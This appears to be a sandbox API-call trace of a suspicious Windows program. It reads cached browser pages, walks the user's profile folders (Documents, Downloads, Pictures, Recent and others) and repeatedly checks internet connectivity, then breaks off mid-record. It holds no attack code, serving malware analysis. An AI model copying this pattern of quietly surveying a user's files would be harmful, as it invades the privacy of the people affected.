| 07:44:53,912 | 504 | NtReadFile |
Buffer => mscom-link" href="http://windows.microsoft.com/en-us/internet-explorer/download-ie" bi:linkid="92" bi:index="3">Web browser</a></li><li id="8fcf7307-4145-41c0-a593-7a93b2d7f660"><a id="0724f8bf-3e37-4098-b7bd-ba25367d2b82" target="_self" class="mscom-link" FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,932 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:53,932 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\details[2].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,932 | 504 | NtReadFile |
Buffer => \xef\xbb\xbf<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="robots" content="noodp,noy FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:53,992 | 504 | NtReadFile |
Buffer => d341-5d25-983130b60b3d" target="_self" class="mscom-link" href="http://support.microsoft.com/?WT.mc_id=MSCOM_EN_US_HP_MODHOME_131Z4ENUS21977" bi:linkid="Modules_For home_Support_Microsoft Support home" bi:index="0">Find more support</a></li><li id="c820ee4 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:54,052 | 504 | NtReadFile |
Buffer => ></p><p><span class="loc" locid="2aa866d9-1372-ffaa-83ca-503b9dd1caf9" srcid="2aa866d9-1372-ffaa-83ca-503b9dd1caf9">Microsoft Download Manager is free and available for download now.</span></p></div></div></div></div></div></div></div></div><div class="wiz FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:54,142 | 504 | NtReadFile |
Buffer => div></div></div></div></div></div></div><div class="row-fluid" data-cols="1" data-view1="1" data-view2="1" data-view3="1" data-view4="1"><div class="span bp0-col-1-1 bp1-col-1-1 bp2-col-1-1 bp3-col-1-1">
<script type="text/javascript">/*<![CDATA[* FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:54,202 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:54,202 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\eula_text[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:54,202 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html class="no-js consumer" lang="en">
<head>
<script>
(function(e, p){
var m = location.href.match(/platform=(win8|win|mac|linux|cros)/);
e.id = (m && m[1]) ||
(p.indexOf('Windows NT 6.2') > -1 ? 'win8' : p.index FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:54,423 | 504 | NtReadFile |
Buffer => <p>
Google Chrome may include one or more components provided by Adobe Systems Incorporated
and Adobe Software Ireland Limited (collectively \xe2\x80\x9cAdobe\xe2\x80\x9d). Your use of the Adobe software
as provided by Google (\xe2\x80\x9cAdobe So FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:54,483 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:54,483 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => \xa8\x00\x00\x00\x00\x00\x00\x00\xa0\xd2\xad\xef\xdf\x91\xcf\x01\xa0\xd2\xad\xef\xdf\x91\xcf\x01\xa0\xd2\xad\xef\xdf\x91\xcf\x01\xa0\xd2\xad\xef\xdf\x91\xcf\x01\xd9\x15\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00J\x00\x00\x00\x00\x00\x00\x00\x18\x00F\x001\x001\x007\x003\x009\x00~\x001\x00.\x00J\x00P\x00G\x00F\x001\x001\x007\x003\x009\x003\x00A\x00E\x00B\x004\x000\x00C\x00D\x008\x009\x00D\x00C\x00F\x001\x001\x00D\x005\x002\x006\x002\x005\x000\x008\x00E\x00[\x001\x00]\x00.\x00j\x00p\x00g\x00\xa8\x00\x00\x00\x00\x00\x00\x00\xd0s~\xef\xdf\x91\xcf\x01\xd0s~\xef\xdf\x91\xcf\x01\xd0s~\xef\xdf\x91\xcf\x01\xd0s~\xef\xdf\x91\xcf\x01C\x15\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00F\x00\x00\x00\x00\x00\x00\x00\x18\x00F\x006\x00D\x009\x007\x006\x00~\x001\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:54,483 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\flex[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:54,483 | 504 | NtReadFile |
Buffer =>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript">si_ST=new Date;var Conf FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:54,573 | 504 | NtReadFile |
Buffer => syb69M0xVkZV42qTnbUclxLE4O8h+nHpV+e6ivJIHW3CyxRbJVJ7jvVBJhLO+F3Y6DHShuzLjG+g64vHeDMk29gR8rA5p9qzyW88vlnhcZA4qaG8EdsYHt4zyW3EfNUME0hjaKFXYOcBUGSfoKSle5UqfLbUqWsTPOTCAZMcDtVmyhV9StUwQZJlVlI9+a0IdLurO2Zrm0lt3c4QyjB/D8xWno1pALuKW7YPIuQjkYCHpnA/zzWqoznFyirolRd0 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:54,653 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:54,653 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:54,653 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x001728f0 | |
| 07:44:54,653 | 1308 | OpenServiceW |
ServiceControlManager => 0x001728f0 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x00172820 | |
| 07:44:54,653 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:54,653 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:54,653 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:54,663 | 504 | NtReadFile |
Buffer => Y9z8RiBuUi1I6HSPKRajHl1B9cbmhuMTsR+ZpcozByFZz1/1LqIG52UwndCjtdRsFen0Jqaf6Vm2krdVOyhcTVMki7fignT6o6abLZ54zGi+/Rr19w9TT0079na1Ge1MdJeMB2s4lqcfppdbmn1HDUCM1euIGE4Vxr5iEDrT7olhL8K7j3ZddjzNB4kw1E7IJxTk7DNFUnJaZaySfcjFaCMXo2ELRrlG7lHeNmRYxpvOEO1JMpDiLrwBzHHMj7wr FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:54,723 | 504 | NtReadFile |
Buffer =>
<div class="elc">Altidore out</div>
<div class="elc">again</div>
<div class="news"> <div c FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:54,943 | 504 | NtReadFile |
Buffer => DATA=",p=location.hostname.match(/([^.]+\.[^.]*)$/);i==""&&p&&(i="http://a4."+p[0]),n.ping=new Image,n.Log=function(n,t,i,u){w||(l("Init","CI","Base",!1),o=sb_st(r,v),w=1,sj_be(_w,"beforeunload",r,!1)),l(n,t,i,u,[].slice.apply(arguments).slice(4))},n.Rende FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:55,004 | 504 | NtReadFile |
Buffer => argedFeed();var r=i.widgetsArray[i.activeWidgetIndex];i.jqWidgets.length>1&&r.LastPageIndex+1>=r.MaxPages?(i.AnimateWidget(i.GetRightWidgetIndex(),n),i.widgetsArray[i.activeWidgetIndex].LastPageIndex=0):i.AnimateFeeds(i.GetRightFeedContent(),t,!0)},i.Anima FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:55,024 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:55,024 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\f[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:55,024 | 504 | NtReadFile |
Buffer => window.google.ac.h(["chro",[["chro\u003cb\u003eme\u003c\/b\u003e",0],["chro\u003cb\u003emecast\u003c\/b\u003e",0],["chro\u003cb\u003emecast apps\u003c\/b\u003e",0],["chro\u003cb\u003eme store\u003c\/b\u003e",0],["chro\u003cb\u003emebook\u003c\/b\u003e",0], FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:55,024 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:55,024 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\f[3].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:55,024 | 504 | NtReadFile |
Buffer => window.google.ac.h(["chrome",[["chrome",0],["chrome\u003cb\u003ecast\u003c\/b\u003e",0],["chrome\u003cb\u003ecast apps\u003c\/b\u003e",0],["chrome\u003cb\u003e store\u003c\/b\u003e",0],["chrome\u003cb\u003ebook\u003c\/b\u003e",0],["chrome\u003cb\u003e remo FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:55,034 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:55,034 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\f[4].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:55,034 | 504 | NtReadFile |
Buffer => (function(){var f=this,h=function(a){var b=typeof a;if("object"==b)if(a){if(a instanceof Array)return"array";if(a instanceof Object)return b;var d=Object.prototype.toString.call(a);if("[object Window]"==d)return"object";if("[object Array]"==d||"number"==ty FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:55,044 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:55,044 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => \x80\x00\x00\x00\x00\x00\x00\x00p@\xd0\xee\xdf\x91\xcf\x01p@\xd0\xee\xdf\x91\xcf\x01p@\xd0\xee\xdf\x91\xcf\x01p@\xd0\xee\xdf\x91\xcf\x01+\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x18\x00P\x00R\x00I\x00M\x00E\x00D\x00~\x001\x00.\x00G\x00I\x00F\x00p\x00r\x00i\x00m\x00e\x00d\x00n\x00s\x00[\x001\x00]\x00.\x00g\x00i\x00f\x009\x00D\x00\x88\x00\x00\x00\x00\x00\x00\x00`\x87w\xf0\xdf\x91\xcf\x01`\x87w\xf0\xdf\x91\xcf\x01`\x87w\xf0\xdf\x91\xcf\x01`\x87w\xf0\xdf\x91\xcf\x01P \x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x16\x00R\x00E\x00N\x00D\x00E\x00R\x00~\x001\x00.\x00J\x00S\x00\x00\x00r\x00e\x00n\x00d\x00e\x00r\x00e\x00r\x00_\x00l\x00i\x00g\x00h\x00t\x00[\x001\x00]\x00 |
SUCCESS | 0x00000000 | |
| 07:44:55,044 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:55,044 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:55,044 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:55,044 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:55,044 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:55,124 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\My Documents\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:55,124 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xf5Y\xb9\xd5I\xcd\x01\xc0\xf0a(\xf2\x91\xcf\x01\x00\xc0A\x98\xe0\x91\xcf\x01\x00\xc0A\x98\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00B\x009\x00R\x00x\x00\x00\x00\x00\x00\x00\x00\xf0-v\xba\xd5I\xcd\x01\x00\x97&3\xf2\x91\xcf\x01\x004\xd3\xbe\xd5I\xcd\x01\x004\xd3\xbe\xd5I\xcd\x01J\x00\x00\x00\x00\x00\x00\x00P\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\x00\xc0A\x98\xe0\x91\xcf\x01\x10\x96!\x0e\xe8\x91\xcf\x01\x10\x96!\x0e\xe8\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:55,124 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:55,214 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\My Documents\Downloads\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:55,214 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xc0A\x98\xe0\x91\xcf\x01\x10\x96!\x0e\xe8\x91\xcf\x01\x10\x96!\x0e\xe8\x91\xcf\x01\x10\x96!\x0e\xe8\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x88\x00\x00\x00\x00\x00\x00\x00P\xae\xc6\x0f\xe3\x91\xcf\x01p\x10\xc6x\xe7\x91\xcf\x01PF\x8a\x10\xe3\x91\xcf\x01\xb0 \xd1\xc3\xe7\x91\xcf\x01\x10\xc8+\x00\x00\x00\x00\x00\x00\xd0+\x00\x00\x00\x00\x00 \x00\x00\x00&\x00\x00\x00\x00\x00\x00\x00\x18\x00D\x00O\x00T\x00N\x00E\x00T\x00~\x002\x00.\x00E\x00X\x00E\x00d\x00o\x00t\x00N\x00e\x00t\x00F\x00x\x003\x005\x00s\x00e\x00t\x00u\x00p\x00.\x00e\x00x\x00e\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00\xf0g(\xe1\xe2\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:55,214 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:55,224 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:55,304 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\My Documents\My Music\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:55,304 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0u\x85\xba\xd5I\xcd\x01\xc0\xf0a(\xf2\x91\xcf\x010\xbb\xd4\xbe\xd5I\xcd\x010\xbb\xd4\xbe\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MICx\x00\x00\x00\x00\x00\x00\x00\xd0u\x85\xba\xd5I\xcd\x01\xa0\xf7$5\xf2\x91\xcf\x010\xbb\xd4\xbe\xd5I\xcd\x010\xbb\xd4\xbe\xd5I\xcd\x01\xb3\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00e\x00t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfd\x86\xba\xd5I\xcd\x01\x00\xfd\x86\xba\xd5I\xcd\x01\x00\xfd\x86\xba\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:55,304 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:55,304 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:55,464 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:55,464 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:55,464 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:55,464 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:55,484 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:55,534 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\My Documents\My Pictures\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:55,534 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00P<y\xba\xd5I\xcd\x01\xc0\xf0a(\xf2\x91\xcf\x01\x004\xd3\xbe\xd5I\xcd\x01\x004\xd3\xbe\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MICx\x00\x00\x00\x00\x00\x00\x00\x80\xc3z\xba\xd5I\xcd\x01\xb0 \xc73\xf2\x91\xcf\x01\x004\xd3\xbe\xd5I\xcd\x01\x004\xd3\xbe\xd5I\xcd\x01\xb5\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00e\x00t\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xee\x83\xba\xd5I\xcd\x01\xd0u\x85\xba\xd5I\xcd\x01\xd0u\x85\xba\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:55,544 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:55,544 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:55,544 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:55,624 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\NetHood\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:55,624 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x10\xf5Y\xb9\xd5I\xcd\x010\x8d)5\xf2\x91\xcf\x01\xc0\x1619oI\xcd\x01 \xc4j\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:55,624 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:55,624 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:55,705 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\PrintHood\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:55,705 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x01\xe0mX\xb9\xd5I\xcd\x01\xf0\x9d29oI\xcd\x01 \xc4j\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:55,705 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:55,705 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:55,785 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Recent\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:55,785 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x01\x00_q5\xf2\x91\xcf\x01\x00_q5\xf2\x91\xcf\x01\x00_q5\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00B\x009\x00R\x00x\x00\x00\x00\x00\x00\x00\x00\x00\xecX5\xf2\x91\xcf\x010sZ5\xf2\x91\xcf\x010sZ5\xf2\x91\xcf\x010sZ5\xf2\x91\xcf\x01\xf3\x03\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00A\x00G\x00E\x00N\x00T\x00(\x00~\x001\x00.\x00L\x00N\x00K\x00a\x00g\x00e\x00n\x00t\x00 \x00(\x002\x00)\x00.\x00l\x00n\x00k\x00p\x00\x00\x00\x00\x00\x00\x00\xc0\x86]\xc6\xe7\x91\xcf\x01\xb0*e\xc6\xe7\x91\xcf\x01\xb0*e\xc6\xe7\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:55,795 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:55,795 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:55,885 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\SendTo\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:55,885 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x010\x84\x88\xba\xd5I\xcd\x010\x84\x88\xba\xd5I\xcd\x010\x84\x88\xba\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00B\x009\x00R\x00\xb0\x00\x00\x00\x00\x00\x00\x00`\xa7d\xb9\xd5I\xcd\x01`\xa7d\xb9\xd5I\xcd\x010\x9bs\xb0\xd4I\xcd\x01\x90.f\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00R\x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00O\x00M\x00P\x00R\x00E\x00~\x001\x00.\x00Z\x00F\x00S\x00C\x00o\x00m\x00p\x00r\x00e\x00s\x00s\x00e\x00d\x00 \x00(\x00z\x00i\x00p\x00p\x00e\x00d\x00)\x00 \x00F\x00o\x00l\x00d\x00e\x00r\x00.\x00Z\x00F\x00 |
SUCCESS | 0x00000000 | |
| 07:44:55,895 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:55,895 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:55,975 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Start Menu\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:55,975 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0mX\xb9\xd5I\xcd\x01\xc0\xf0a(\xf2\x91\xcf\x01\xf0\x9d29oI\xcd\x01 \xc4j\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00B\x009\x00R\x00x\x00\x00\x00\x00\x00\x00\x00`\xa7d\xb9\xd5I\xcd\x01\xb0 